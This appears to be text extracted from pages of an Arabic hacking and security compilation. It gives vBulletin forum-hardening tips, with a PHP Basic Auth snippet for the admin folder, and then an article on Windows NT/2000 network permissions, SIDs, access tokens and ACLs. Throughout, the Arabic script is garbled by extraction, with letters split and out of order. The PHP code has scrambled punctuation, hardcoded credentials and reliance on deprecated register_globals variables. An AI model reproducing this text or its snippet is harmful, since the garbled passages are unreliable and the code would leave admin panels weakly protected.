!! ‫اﻋ ﺮ فﻓﻲ ﻣﻦﺗﺜ ﻖ و ﻣﻦ ﻻ‬.. ‫ﺘﻮ ﺣﺎن‬ ‫ ﺪاﺋﻤﺎاﺟﻌ ﻞ ﻋﯿﻨﺎك ﻣﻔ‬.. ‫ﻻﺗﺪﻋﻬﻢاﺑﺪا ﯾﻘﺒ ﻀﻮن ﻋﻠﯿﻚ‬
( ‫ﻻﺗﻔﻜ ﺮﻓﻲ ﻧﻔﺴﻚﻓﻘﻂ )اﻧﻤﺎاﯾ ﻀﺎﺗﺬﻛ ﺮﻛ ﻞ ﻣﻦ ﺣﻮﻟﻚ‬
.... ‫ﺘﻌﻪ واﻣﻨﻪ‬‫ﺗﻤﻨﯿﺎﺗﻲﻟﻠﺠﻤﯿﻊﺑ ﺤﯿﺎة ﻣﻤ‬

٥٨
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﲪﺎﯾﺔ اﳌﻨﺘﺪﯾﺎت "‬

‫‪$$$$$$$$$$$$$‬‬
‫ﻗﻪﻟﺸﺒﻜﺔاﻟﻌﻘ ﺮب‬
‫ﺣﻘﻮ‬
‫‪$$$$$$$$$$$$$‬‬

‫ﺘﺪﯾﺎ ت واﻟﻜ ﻞ ﯾﻌ ﺮ فأﯾ ﻀﺎأﻧﻬﺎ ﻣﻠﯿﺌﺔﺑﺎﻟﺜﻐ ﺮا ت ﺎﻟﻜﺒﯿ ﺮة‬


‫ﺘﻲ ﯾﺼﻤﻢﺑﻬﺎاﻟﻤﻨ‬
‫ﺎﻟﻜ ﻞ ﯾﻌ ﺮ فﻟﻐﺔ ‪ php‬واﻟ‬

‫ﺘﺪاك ‪/‬‬
‫ﺘﻢﺑﻬﺎ ﺣﻤﺎﯾﺔ ﻣﻨ‬
‫ﺘﻲ ﯾ‬
‫ﺘﺪى ) ‪( vb‬ﺑﻌ ﺾاﻷﺳﺎﺳﯿﺎ تاﻟ‬
‫ﺈﻟﯿﻚ ﻣﺪﯾ ﺮأي ﻣﻨ‬

‫ﺘﺪى وﻛ ﻞ ﺷﻲ ء‬
‫ﺘﺐﻓﯿﻪاﻟﻤﺸﺎرﻛﺎ ت وﺗﻌﺪﯾ ﻞاﻟﻤﻨ‬
‫ﺛﻨﯿﻦ وا ﺣﺪﺗﻜ‬
‫ً وﻗﺒ ﻞﻛ ﻞ ﺷﻲ ءاﻟﻤﺪﯾ ﺮاﻟﻌﺎم ﺿﻊ ﻣﺪﯾ ﺮﯾﻦإ‬ ‫‪-١‬ﻻ‬
‫ﺘﯿﺎط ﻋﻨﺪﻣﺎ ﯾﺴ ﺮ قاﻟﻤﺪﯾ ﺮاﻟﻌﺎم ‪.‬‬
‫واﻵ ﺧ ﺮﻟ ﻺ ﺣ‬

‫ـﻤﺠﻠﺪ ‪admin‬ﺑﻮاﺳﻄﺔاﻟﻤﻔﻜ ﺮة و‬
‫ﺘﺢ ﻣﻠ ﻒ ‪ index.php‬ﺎﻟﻤﻮﺟﻮدﺑ‬‫ﺘ ﺤﻜﻢﺑﻜﻠﻤﺔ ﺳ ﺮأيإﻓ‬
‫‪-٢‬ﻣﻲﻟﻮ ﺣﺔاﻟ‬
‫أ ﺿ ﻒ ﻋﻠﯿﻪﻛﻮدﻛﻠﻤﺔاﻟﺴ ﺮاﻟﺬي ﻫﻮ ‪/‬‬

‫‪<?php‬‬

‫;"‪$LOGIN = "User‬‬
‫;"‪$PASSWORD = "Password‬‬

‫{ )‪function error ($error_message‬‬


‫"‪echo $error_message.‬‬
‫;"‬
‫;‪exit‬‬
‫}‬

‫&& )‪if ( (!isset($PHP_AUTH_USER)) || ! (($PHP_AUTH_USER == $LOGIN‬‬


‫{ ) )) "‪( $PHP_AUTH_PW == "$PASSWORD‬‬
‫;)""‪header("WWW-Authenticate: Basic entrer="Form2txt admin‬‬
‫;)"‪header("HTTP/1.0 401 Unauthorized‬‬
‫>‪error("<p align=right><font face=Tahoma size=2 color=Red‬ﻟﯿ ﺲ ﻣﻦ ﺣﻘﻚ‬
‫اﻟﺪ ﺧﻮ لإﻟﻰﻫﺬهاﻟﺼﻔ ﺤﺔ ;)">‪</font></p‬‬
‫}‬
‫>?‬
‫ﺘﻲ‬‫ﻣﻊﺗﻐﯿﯿ ﺮﻛﻠﻤ‬
‫‪User‬‬
‫ﻮ‬
‫‪Password‬‬

‫‪ -٣‬غﻗﺎﺋﻤﺔاﻷﻋ ﻀﺎ ءﻟﻤﺎذا ؟؟ ﻣﺜﻼﻟﻮﻛﺎنﻟﺪﯾﻚ ‪ ٣٠٠٠‬ﻋ ﻀﻮ وو ﺿﻊاﻟﺰاﺋ ﺮاﻟﻜ ﺮﯾﻢﻗﺎﺋﻤﺔاﻷﻋ ﻀﺎ ء وﻗﻌﺪ‬


‫ﺘﺪىﻗﺪﺗﺴﺄﻟﻮﻧﻲﻟﻤﺎذا ﻻ ﻧﻠﻐﻲﻗﺎﺋﻤﺔاﻟﺒ ﺤﺚ !!ﻷناﻟﺒ ﺤﺚﻓﻲ‬ ‫ﯾﻔ ﺤﻂﺑﻪأ ﺻﺒﺢ ﻫﻨﺎك ﺿﻐﻂﻛﺒﯿ ﺮ ﻋﻠﻰاﻟﻤﻨ‬

‫‪٥٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺎﻟﻨﺴ ﺦ ﺎﻟﺠﺪﯾﺪة ﯾﻜﻮنﺑﺄﻛﺜ ﺮ ﻣﻦﺛﻼ ثأ ﺣ ﺮ ف وﺑﻬﺬاﻟﻦ ﯾﻜﻮنﻫﻨﺎكأي ﺿﻐﻂ ‪.‬‬

‫ﺛﻨﯿﻦﻓﻘﻂﻟﻮﺟﻮداﻟ ﻀ ﺮورة ‪..‬ﻟﻤﺎذا ؟؟‬‫ﺘﺪى وا ﺣﺪأوإ‬‫ﺘ ﺤﻬﺎﺑﻤﻨ‬


‫ﺘﺪﯾﺎ تأيإﻓ‬‫ﺘﺢﻟﻐﺔ ‪HTML‬ﻓﻲاﻟﻤﻨ‬ ‫‪-٤‬ﺗﻜﺜ ﺮﻓ‬
‫ﺘﻤﺪ ﻋﻠﻰ ﻫﺬهاﻟﻠﻐﺔ ‪.‬‬
‫ﺘﻲﺗﻌ‬ ‫ﺘﻤ ﻞ ﯾﻔﺴﺪ ﺟﻤﯿﻊاﻟﻤﻮا ﺿﯿﻊاﻟ‬
‫ﻷﻧﻪ ﯾﻮﺟﺪﻛﻮد ﻫ‬

‫ﻗﯿﻊ ‪.‬إﺟﻌﻠﻪﻓﻘﻂ ﯾﺨﺪماﻟﺼﻮرأﻣﺎاﻟﻔﻼ ش و ﺎﻟﺼﻮ تﻓﻼ ‪....‬‬


‫ﺘﻮ‬‫ﻗﯿﻊ و ﻣﺎأدراك ﻣﺎاﻟ‬
‫‪-٥‬ﺗﻮ‬

‫‪٦٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫"أﻣﻦ اﻟﺸﺒﻜﺎت"‬

‫‪$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪:‬اﻟﺠﻮﻛ ﺮ‬
‫‪$$$$$$$$$‬‬

‫ﻗﺎﯾﺔ ﻣﻨﻬﺎ‪.‬‬
‫ﺘﻌ ﺮ ضﻟﻬﺎاﻟﺸﺒﻜﺔ وﻛﯿﻔﯿﺔاﻟﻮ‬ ‫ﺘﻲﻗﺪﺗ‬ ‫‪ -١‬ﻋ ﺮ ضﻟﺒﻌ ﺾ ﺎﻟﻤﺨﺎ ﻃ ﺮاﻷﻣﻨﯿﺔاﻟ‬
‫ﻗﺔ ﺎﻟﻮﻟﻮجاﻟﻰاﻟﺸﺒﻜﺔﺑﺄﻣﻨﻬﺎ‪.‬‬ ‫‪ -٢‬ﻮ ﺻ ﻒﻟﻌﻼ‬
‫‪-٣‬ﻛﯿﻔﯿﺔ ﺣﻤﺎﯾﺔاﻟﻤﻮاردﺑﻮاﺳﻄﺔﺗ ﺮا ﺧﯿ ﺺاﻟﻮ ﺻﻮ ل‪.‬‬
‫‪ -٤‬ﺷ ﺮ حﻟﻤﻜﻮﻧﺎ ت ‪ACL.‬‬
‫ﺘ ﺮا ﺧﯿ ﺺ‪.‬‬
‫‪ -٥‬ﺷ ﺮ حﻟﻌﻤﻠﯿﺔﺗﻔ ﺤ ﺺاﻟ‬

‫ﺄي ﺷﺒﻜﺔﻗﺪﺗﻜﻮن ﻋ ﺮ ﺿﺔﻟﻠﻮﺻﻮ ل ﻏﯿ ﺮاﻟﻤ ﺮ ﺧ ﺺﻷي ﻣﻤﺎ ﯾﻠﻲ‪:‬‬

‫‪ -١‬ﺎﻟﻤﻌﺪا ت‪.‬‬

‫‪ -٣‬ﺎﻟﺒﯿﺎﻧﺎ ت‪.‬‬

‫‪ -٣‬ﻋﻤﻠﯿﺎ تاﻟﺸﺒﻜﺔ‪.‬‬

‫‪ -٤‬ﺎﻟﻤﻮارد‪.‬‬

‫ﺘﺪاوﻟﺔ ﻋﺒ ﺮاﻟﺸﺒﻜﺔ‪.‬‬
‫ﺘﻤﺪ درﺟﺔأﻣﻦاﻟﺸﺒﻜﺔ ﻋﻠﻰ ﻣﺪى ﺣﺴﺎﺳﯿﺔاﻟﺒﯿﺎﻧﺎ تاﻟﻤ‬
‫ﺗﻌ‬

‫ﺘ ﺤﻜﻢ‬
‫ﺘ ﺤﻜﻢﻓﻲأﻣﻨﻪاﻟﺨﺎ ص ‪،‬ﺑﯿﻨﻤﺎ ﯾ‬
‫ﺘﻢﺗﻨﻈﯿﻢاﻷﻣﻦ وﻓﻘﺎﻟﻨﻮ عاﻟﺸﺒﻜﺔ ‪،‬ﻓﻔﻲ ﺷﺒﻜﺎ تاﻟﻨﺪﻟﻠﻨﺪﻛ ﻞ ﺟﻬﺎز ﯾ‬
‫ﻮﯾ‬
‫اﻟﻤﺰودﻓﻲﺄﻣﻦ ﺷﺒﻜﺎ تاﻟﺰﺑﻮناﻟﻤﺰود‪.‬‬

‫ﺘﻲﺗﺴﺎﻋﺪﻓﻲاﻟﻤ ﺤﺎﻓﻈﺔ ﻋﻠﻰﺄﻣﻦاﻟﺸﺒﻜﺔ‪:‬‬


‫ﻮ ﻫﻨﺎكﺑﻌ ﺾاﻹﺟ ﺮا ءا تاﻟ‬

‫ﺘﻌﺎﻣ ﻞ ﻣﻊإﺟ ﺮا ءا تاﻷﻣﻦ‪.‬‬


‫ﺘﺨﺪﻣﯿﻦ ﻋﻠﻰاﻟ‬
‫ﺘﻘﻦﻟﻠﻤﺴ‬
‫ﺘﺪرﯾﺐاﻟﻤ‬
‫‪ -١‬ﺎﻟ‬

‫ﺘﺄﻛﺪ ﻣﻦأﻣﻦاﻟﻤﻌﺪا ت و ﺻﻌﻮﺑﺔاﻟﻮ ﺻﻮ لاﻟﯿﻬﺎ ﻣﻦﻗﺒ ﻞ ﻏﯿ ﺮاﻟﻤﺨﻮﻟﯿﻦ‪.‬‬


‫‪-٢‬اﻟ‬

‫ﺘﺠﺴ ﺲ‪.‬‬
‫‪ -٣‬ﺣﻤﺎﯾﺔاﻷﺳﻼكاﻟﻨ ﺤﺎﺳﯿﺔ وإ ﺧﻔﺎ ءﻫﺎ ﻋﻦاﻷﻋﯿﻦﻷﻧﻬﺎﻗﺪﺗﻜﻮن ﻋ ﺮ ﺿﺔﻟﻠ‬

‫ﺘ ﻀﻌﻬﺎ وﻛﺎﻟﺔاﻷﻣﻦ ﺎﻟﻮ ﻃﻨﻲاﻷﻣ ﺮﯾﻜﯿﺔ ‪National‬‬


‫ﺘﺸﻔﯿ ﺮﻓ‬
‫‪-٤‬ﺗﺸﻔﯿ ﺮاﻟﺒﯿﺎﻧﺎ ت ﻋﻨﺪاﻟ ﺤﺎﺟﺔأﻣﺎ ﻣﻘﺎﯾﯿ ﺲاﻟ‬
‫‪Security Agency (NSA).‬‬

‫ﻗ ﺮا ص ﺻﻠﺒﺔ ‪،‬‬
‫ﺘﻰأ‬‫ﻗ ﺮا ص ﻣ ﺮﻧﺔأو ﻣ ﻀﻐﻮ ﻃﺔأو ﺣ‬‫ﺘﻮي ﻋﻠﻰ ﻣ ﺤ ﺮﻛﺎ تأ‬‫ﺘﺨﺪﻣﯿﻦﺑﺄﺟﻬﺰة ﻻﺗ ﺤ‬ ‫‪-٥‬ﺗﺰوﯾﺪاﻟﻤﺴ‬
‫ﻗﻼ ع ‪ ROM Boot Chip‬ﻮ ﻋﻨﺪﺗﺸﻐﯿ ﻞ ﻫﺬهاﻷﺟﻬﺰة‬ ‫ﻗﺔإ‬ ‫ﻗﺎ‬
‫ﺘﺨﺪام ر‬
‫ﺘﺼ ﻞ ﻫﺬه ﺎﻷﺟﻬﺰةﺑﺎﻟﻤﺰودا تﺑﺎﺳ‬ ‫وﺗ‬
‫ﻗﻼ عﻓﻲ ذاﻛ ﺮة ‪RAM‬ﻟﻠﺠﻬﺎزﻟﯿﺒﺪأﺑﺎﻟﻌﻤ ﻞ‪.‬‬ ‫ﺘ ﺤﻤﯿ ﻞﺑ ﺮﻧﺎﻣ ﺞاﻹ‬‫ﯾﻘﻮماﻟﻤﺰودﺑ‬

‫‪٦١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻬﺎ ﻋﻨﺪ ﺎﻟ ﻀ ﺮورة‪.‬‬


‫ﺘﻢإﺟ ﺮاؤﻫﺎ ﻋﻠﻰاﻟﺸﺒﻜﺔﻟﻤ ﺮاﺟﻌ‬
‫ﺘﻲ ﯾ‬
‫ﺘﺴﺠﯿ ﻞ ﺟﻤﯿﻊاﻟﻌﻤﻠﯿﺎ تاﻟ‬
‫ﺘﺨﺪامﺑ ﺮاﻣ ﺞﻟ‬
‫‪-٦‬اﺳ‬

‫ﺘﺨﺪﻣﯿﻦﻟﻠﻮﺻﻮ لﻟﻠﺒﯿﺎﻧﺎ ت و ﺎﻟﻤﻌﺪا تﻛ ﻞ ﺣﺴﺐ ﻃﺒﯿﻌﺔ ﻋﻤﻠﻪ و‬‫‪-٧‬ﺈﻋﻄﺎ ءﺗﺼﺎرﯾﺢ ‪Permissions‬ﻟﻠﻤﺴ‬


‫ﺘﺨﺪاﻣﻬﺎ‪.‬‬ ‫ﻓﻲ ﻫﺬهاﻟ ﺤﺎﻟﺔ ﯾﺠﺐ ﻣﺸﺎرﻛﺔاﻟﺒﯿﺎﻧﺎ ت واﻟﻤﻌﺪا تﻟﻠﺴﻤﺎ حﻟﻶ ﺧ ﺮﯾﻦﺑﺎﺳ‬

‫ﺘﺨﺪﻣﯿﻦﺑ ﺤﻘﻮ ق ‪Rights‬ﺗ ﺤﺪداﻷﻧﺸﻄﺔ و ﺎﻟﻌﻤﻠﯿﺎ تاﻟﻤﺴﻤﻮ حﻟﻬﻢإﺟ ﺮا ءﻫﺎ ﻋﻠﻰاﻟﻨﻈﺎم‪.‬‬


‫‪-٨‬ﺗﺰوﯾﺪاﻟﻤﺴ‬

‫ﺘﺼﺎرﯾﺢ واﻟ ﺤﻘﻮ ق ‪:‬‬


‫ﻫﻨﺎك ﻧﻈﺎﻣﺎنأﺳﺎﺳﯿﺎن ﻹﻋﻄﺎ ء ﺎﻟ‬

‫‪ -١‬ﺎﻟﻤﺸﺎرﻛﺔاﻟﻤ ﺤﻤﯿﺔﺑﻜﻠﻤﺔ ﻣ ﺮور‪.‬‬

‫‪-٢‬ﺗﺼﺎرﯾﺢ ﺎﻟﻮ ﺻﻮ ل‪.‬‬

‫ﺘﻢاﻟﻮﺻﻮ لﻟﻬﺬهاﻟﻤﻮاردﻓﻘﻂ‬
‫ﺘﻬﺎ و ﯾ‬
‫ﺘﻢﺗﻌﯿﯿﻦﻛﻠﻤﺔ ﺳ ﺮﻟﻜ ﻞ ﻣﻦاﻟﻤﻮارداﻟﻤﻄﻠﻮب ﻣﺸﺎرﻛ‬ ‫ﻓﻲاﻟﻨﻈﺎماﻷو ل ﯾ‬
‫ﻣﻦﻗﺒ ﻞ ﻣﻦﻟﺪﯾﻪﻛﻠﻤﺔاﻟﺴ ﺮ‪.‬‬

‫ﺘﻄﯿﻊﺗ ﺤﺪﯾﺪ درﺟﺔاﻟﻮ ﺻﻮ لﻫ ﻞ ﻫﻲﻟﻠﻘ ﺮا ءةﻓﻘﻂأم وﺻﻮ لﻛﺎﻣ ﻞأم وﻓﻘﺎﻟﻜﻠﻤﺔاﻟﺴ ﺮ‪.‬‬
‫ﻛﻤﺎﺗﺴ‬

‫ﺘﺨﺪﻣﯿﻦ ‪ ،‬و ﯾﻜﻔﻲأن‬ ‫ﺘﺨﺪمأو ﻣﺠﻤﻮﻋﺔ ﻣﺴ‬ ‫ﺘﺼﺎرﯾﺢﻟﻜ ﻞ ﻣﺴ‬ ‫ﺘﻢﺗﻌﯿﯿﻦاﻟ ﺤﻘﻮ ق وإﻋﻄﺎ ءاﻟ‬ ‫ﻓﻲاﻟﻨﻈﺎماﻟﺜﺎﻧﻲ ﯾ‬
‫ﺘﺨﺪم و‬ ‫ﺘﻌ ﺮ فاﻟﻨﻈﺎم ﻋﻠﻰ ﺣﻘﻮ ق ﻫﺬااﻟﻤﺴ‬‫ﺘﺸﻐﯿ ﻞﻟﯿ‬
‫ﺘﺨﺪمﻛﻠﻤﺔاﻟﻤ ﺮور ﻋﻨﺪاﻟﺪ ﺧﻮ لاﻟﻰ ﻧﻈﺎم ﺎﻟ‬ ‫ﯾﺪ ﺧ ﻞاﻟﻤﺴ‬
‫ﺘﺒ ﺮﻫﺬااﻟﻨﻈﺎمأﻛﺜ ﺮأﻣﻨﺎ ﻣﻦاﻟﻨﻈﺎماﻟﺴﺎﺑ ﻖ و ﯾﻌﻄﻲ ﻣﺪﯾ ﺮاﻟﺸﺒﻜﺔﺗ ﺤﻜﻤﺎأﻛﺒ ﺮﺑﻜ ﻞ‬‫ﺘﻮﻓ ﺮةﻟﻪ‪ ،‬و ﯾﻌ‬‫ﺘﺼﺎرﯾﺢاﻟﻤ‬ ‫اﻟ‬
‫ﺘﺨﺪم‪.‬‬‫ﻣﺴ‬

‫ﺘﻢﺗﻤ ﺮﯾ ﺮ ﻫﺬهاﻟﻤﻌﻠﻮﻣﺎ تاﻟﻰ ﻣﺪﯾ ﺮأﻣﻦ ﺎﻟ ﺤﺴﺎﺑﺎ ت ‪Security‬‬


‫ﻋﻨﺪإد ﺧﺎ لاﻹﺳﻢ وﻛﻠﻤﺔاﻟﻤ ﺮور ﯾ‬
‫ﺘﻢ‬‫)‪Accounts Manager (SAM‬ﻓﺈذاﻛﺎناﻟﻮﻟﻮجاﻟﻰ ﺟﻬﺎز ‪Workstation‬ﻓﺈناﻟﻤﻌﻠﻮﻣﺎ ت ﯾ‬
‫ﺘﻬﺎ ﻣﻊﻗﺎﻋﺪةﺑﯿﺎﻧﺎ ت ﺣﺴﺎﺑﺎ تاﻷﻣﻦاﻟﻤ ﺤﻠﯿﺔﻓﻲاﻟﺠﻬﺎز‪،‬أﻣﺎﺈذاﻛﺎناﻟﻮﻟﻮجاﻟﻰ ﻧﻄﺎ ق ‪Domain‬ﻓﺈن‬ ‫ﻣﻘﺎرﻧ‬
‫ﺘﻢإرﺳﺎﻟﻬﺎاﻟﻰ ﻣﺰود ‪ SAM‬ﺎﻟﺬي ﯾﻘﺎرﻧﻬﺎ ﻣﻊﻗﺎﻋﺪةﺑﯿﺎﻧﺎ ت ﺣﺴﺎﺑﺎ تاﻟﻨﻄﺎ ق‪،‬ﻓﺈذاﻛﺎناﺳﻢ‬ ‫اﻟﻤﻌﻠﻮﻣﺎ ت ﯾ‬
‫ﺘﺨﺪم ﯾﻤﻨﻊ ﻣﻦاﻟﺪ ﺧﻮ لاﻟﻰاﻟﻨﻈﺎم‪،‬أﻣﺎإذاﻛﺎﻧﺎ ﺻ ﺤﯿ ﺤﯿﻦ‬ ‫ﺘﺨﺪمأوﻛﻠﻤﺔاﻟﻤ ﺮور ﻏﯿ ﺮ ﺻﺎﻟ ﺤﯿﻦﻓﺈناﻟﻤﺴ‬ ‫اﻟﻤﺴ‬
‫ﺘ ﺮة‬‫ﺘﺨﺪمﻓ‬ ‫ﻗﺔ وﻟﻮج ‪Access Token‬ﺗﻌ ﺮ فاﻟﻨﻈﺎمﺑﺎﻟﻤﺴ‬ ‫ﻓﺈن ﻧﻈﺎم ﺎﻷﻣﻦاﻟﻔ ﺮﻋﻲ ﯾﻘﻮمﺑﺈ ﺻﺪارﺑﻄﺎ‬
‫ﺘﺎﻟﯿﺔ‪:‬‬‫ﻗﺔ ﻋﻠﻰاﻟﻤﻌﻠﻮﻣﺎ تاﻟ‬ ‫ﺘﻮي ﻫﺬهاﻟﺒﻄﺎ‬
‫ﻮﻟﻮﺟﻪ وﺗ ﺤ‬

‫ﻗﻢﻓ ﺮﯾﺪ ﺧﺎ صﺑﻜ ﻞ ﺣﺴﺎب‪.‬‬


‫‪ -١‬ﺎﻟﻤﻌ ﺮ فاﻷﻣﻨﻲ )‪ Security Identifier (SID‬ﻮﻫﻮ ر‬

‫ﺘﺨﺪم‪.‬‬
‫ﺘﻤﻲﻟﻬﺎاﻟﻤﺴ‬
‫ﺘﻲ ﯾﻨ‬
‫ﺘﻲﺗ ﺤﺪداﻟﻤﺠﻤﻮﻋﺔاﻟ‬
‫‪ -٢‬ﻣﻌ ﺮﻓﺎ تاﻟﻤﺠﻤﻮﻋﺔ ‪ Group SIDs‬ﻮﻫﻲاﻟ‬

‫ﺘﯿﺎزا ت ‪ Privileges‬ﻮ ﻫﻲﺗﻤﺜ ﻞاﻟ ﺤﻘﻮ قاﻟﻤﻤﻨﻮ ﺣﺔﻟ ﺤﺴﺎﺑﻚ‪.‬‬


‫‪ -٣‬ﺎﻹﻣ‬

‫ﺘﻚ و ﯾﻄﻠ ﻖ‬
‫ﺘﻚاﻹﺗﺼﺎ ل ﻣﻦ ﺟﻬﺎزكﺑﺠﻬﺎز آ ﺧ ﺮ ﻋﻠﻰ ﺷﺒﻜ‬
‫ﺘﻢﺈ ﺻﺪار ‪ Access Token‬ﻋﻨﺪ ﻣ ﺤﺎوﻟ‬
‫ﻛﻤﺎأﻧﻪ ﯾ‬
‫ﻋﻠﻰ ﻫﺬااﻹﺟ ﺮا ءاﻟﻮﻟﻮج ﻋﻦﺑﻌﺪ ‪Remote Logon.‬‬

‫ﺘﻲ ﯾﺠﺐ ﻣ ﺮاﻋﺎﺗﻬﺎ ﻋﻨﺪاﻟ ﺤﺪﯾﺚ ﻋﻦأﻣﻦاﻟﺸﺒﻜﺔﻫﻮاﻟﻤ ﺤﺎﻓﻈﺔ ﻋﻠﻰأﻣﻦاﻟﻤﻮارد ﻣﺜ ﻞاﻟﻄﺎﺑﻌﺎ ت و‬ ‫ﻣﻦاﻷﻣﻮراﻟ‬
‫ﺘﺨﺪام ﻫﺬهاﻟﻤﻮارد‪.‬‬
‫ﺘﻌﯿﯿﻦﺗﺼﺎرﯾﺢ ﻹﺳ‬ ‫ﺘﻲ ﯾﻘﻮ م ﻣﺪﯾ ﺮاﻟﺸﺒﻜﺔﺑ‬ ‫ﻗ ﺮا ص و ﺎﻟﻤﻠﻔﺎ ت واﻟ‬‫ﻣ ﺤ ﺮﻛﺎ تاﻷ‬
‫ﺘﻲﻗﺪﺗﻌﻄﻰﻟﻠﻮ ﺻﻮ لاﻟﻰاﻟﻤﻠﻔﺎ ت ﻣﺎ ﯾﻠﻲ‪:‬‬ ‫ﺘﺼﺎرﯾﺢاﻟ‬ ‫ﻮ ﻣﻦ ﺎﻟ‬

‫‪٦٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪-١‬ﺗﺼ ﺮﯾﺢﻗ ﺮا ءة و ﯾﺴﻤﺢﻟﻚﺑﻌ ﺮ ض و ﻧﺴ ﺦاﻟﻤﻠﻔﺎ ت‪.‬‬

‫ﺘﻄﺒﯿﻘﺎ ت‪.‬‬
‫‪-٢‬ﺗﺼ ﺮﯾﺢﺗﻨﻔﯿﺬﻟﻠ‬
‫ﺘﻮىاﻟﻤﻠﻔﺎ ت‪.‬‬
‫ﺘﻌﺪﯾ ﻞﻓﻲ ﻣ ﺤ‬‫ﺘﺎﺑﺔ ﻮ ﯾﺴﻤﺢﺑﺎﻟ‬ ‫‪-٣‬ﺗﺼ ﺮﯾﺢﻛ‬
‫ﺘﺨﺪام ‪No Access.‬‬ ‫‪ -٤‬ﻣﻤﻨﻮ عاﻹﺳ‬
‫ٍﺳﻬ ﻞ‪.‬‬
‫ﺘﺨﺪﻣﯿﻦ وﻫﺬاأ‬ ‫ﺘﺨﺪمأو ﻣﺠﻤﻮﻋﺔ ﻣﻦاﻟﻤﺴ‬ ‫ﺘﺼﺎرﯾﺢ ﻣﻤﻜﻦ ﻣﻨ ﺤﻬﺎﻟﻤﺴ‬ ‫واﻟ‬
‫ﺘﻢ‬‫ﺘﻠﻚﻛ ﻞ ﻣﻮرد ﻣﻦاﻟﻤﻮاردﻗﺎﺋﻤﺔﺗ ﺤﻜﻢﺑﺎﻟﻮ ﺻﻮ ل )‪ Access Control List (ACL‬ﻮﻛ ﻞ ﻣﻌﻠﻮﻣﺔ ﯾ‬ ‫ﯾﻤ‬
‫إد ﺧﺎﻟﻬﺎﻓﻲ ‪ ACL‬ﯾﻄﻠ ﻖ ﻋﻠﯿﻬﺎ ‪Access Control Entry (ACE).‬‬
‫ﺘﻪ‬
‫ﺘﺨﺪمأو ﻣﺠﻤﻮﻋ‬ ‫ﺘﻮي ﻋﻠﻰ ‪SID‬ﻟﻠﻤﺴ‬ ‫ﺘﺨﺪاماﻟﻤﻮرد وﺗ ﺤ‬‫ﺘﺼ ﺮﯾﺢ ﻹﺳ‬ ‫ﺘﻢﺈﻧﺸﺎ ء ‪ ACE‬ﻋﻨﺪ ﻣﻨﺢاﻟ‬ ‫ﯾ‬
‫ُﻨﺢﺗﺼ ﺮﯾﺢﻗ ﺮا ءة و‬‫ﺘ ﺮ ﺿﻨﺎأن ﻣﺪﯾ ﺮ ﻣﺠﻤﻮﻋﺔ ﻣﺎﻗﺪ ﻣ‬ ‫ﺘﺼ ﺮﯾﺢ‪،‬ﻓﻠﻮاﻓ‬‫ﺘﺼ ﺮﯾﺢﺑﺎﻹ ﺿﺎﻓﺔاﻟﻰ ﻧﻮ عاﻟ‬ ‫اﻟﻤﻤﻨﻮ ﺣﺔاﻟ‬
‫ﺘﻮي‬‫ﺘﻪاﻟﻰ ‪ ACL‬ﺎﻟﺨﺎ صﺑﺎﻟﻤﻠ ﻒ و ﺳﯿ ﺤ‬ ‫ﺘﻢإﻧﺸﺎؤهﺛﻢإ ﺿﺎﻓ‬ ‫ﺘﺎﺑﺔﻟﻤﻠ ﻒ ﻣﺎﻓﺈن ‪ ACE‬ﺟﺪﯾﺪ ﯾ‬ ‫ﺗﺼ ﺮﯾﺢﻛ‬
‫ﺘﺎﺑﺔ‪.‬‬‫‪ACE‬ﻋﻠﻰ ‪SID‬ﻟﻤﺪﯾ ﺮاﻟﻤﺠﻤﻮﻋﺔﺑﺎﻹ ﺿﺎﻓﺔاﻟﻰﺗﺼ ﺮﯾﺢﻗ ﺮا ءة وﺗﺼ ﺮﯾﺢﻛ‬

‫ﻫﻨﺎك ﻧﻮﻋﺎن ل ‪ACE :‬‬

‫‪-١‬اﻟﻮﺻﻮ ل ﻣﺴﻤﻮ ح ‪AccessAllowed.‬‬

‫ﺘﻢإﻧﺸﺎؤﻫﺎإذاﻛﺎنﺗﺼ ﺮﯾﺢاﻟﻮ ﺻﻮ ل ﻫﻮ ‪No Access.‬‬


‫‪ -٢‬ﺎﻟﻮﺻﻮ ل ﻣﻤﻨﻮ ع ‪ AccessDenied‬ﻮ ﯾ‬

‫ﺘﻢ ﻣﻘﺎرﻧﺔ ‪ SID‬ﺎﻟﺨﺎ صﺑﻪ ﻣﻊ ‪SIDs‬ﻓﻲﻛ ﻞ‬


‫ﺘﺨﺪم ﻣﺎاﻟﻮ ﺻﻮ لاﻟﻰ ﻣﻮرد ﻣﺎ ﯾ‬‫ﻮ ﻫﻜﺬا ﻋﻨﺪﻣﺎ ﯾ ﺤﺎو ل ﻣﺴ‬
‫‪ACE‬ﻣﻦ ‪ACL‬ﻟﻠﻤﻮرد‪.‬‬

‫ﺘﻢﺗﺮﺗﯿﺐ ‪ACE‬ﺑ ﺤﯿﺚﺗﻜﻮن ‪AccessDenied ACEs‬ﻗﺒ ﻞ‬ ‫ﻓﻲ وﯾﻨﺪوز ‪ NT‬ﻮ وﯾﻨﺪوز ‪ ٢٠٠٠‬ﯾ‬
‫ﺘﻚﻓﻲأي ﻣﻦ ‪AccessDenied ACEs‬‬ ‫‪AccessAllowed ACEs ،‬ﻓﺈذا وﺟﺪ ‪ SID‬ﺧﺎ ﺻ‬
‫ﺘﺄﻛﺪ ﻣﻦاﻟ ﺤﻘﻮ ق‬
‫ﺘﻤﻨﻊ ﻣﻦاﻟﻮﺻﻮ لاﻟﻰاﻟﻤﻮرد وإﻻﻓﺴﯿﺒ ﺤﺚﻓﻲ ‪AccessAllowed ACEs‬ﻟﻠ‬ ‫ﻓﺴ‬
‫ﺘﻌ ﺮ ض رﺳﺎﻟﺔﺗ ﺤﺬﯾ ﺮﺗﻤﻨﻌﻚ ﻣﻦاﻟﻮﺻﻮ لﻟﻠﻤﻮرد‪.‬‬
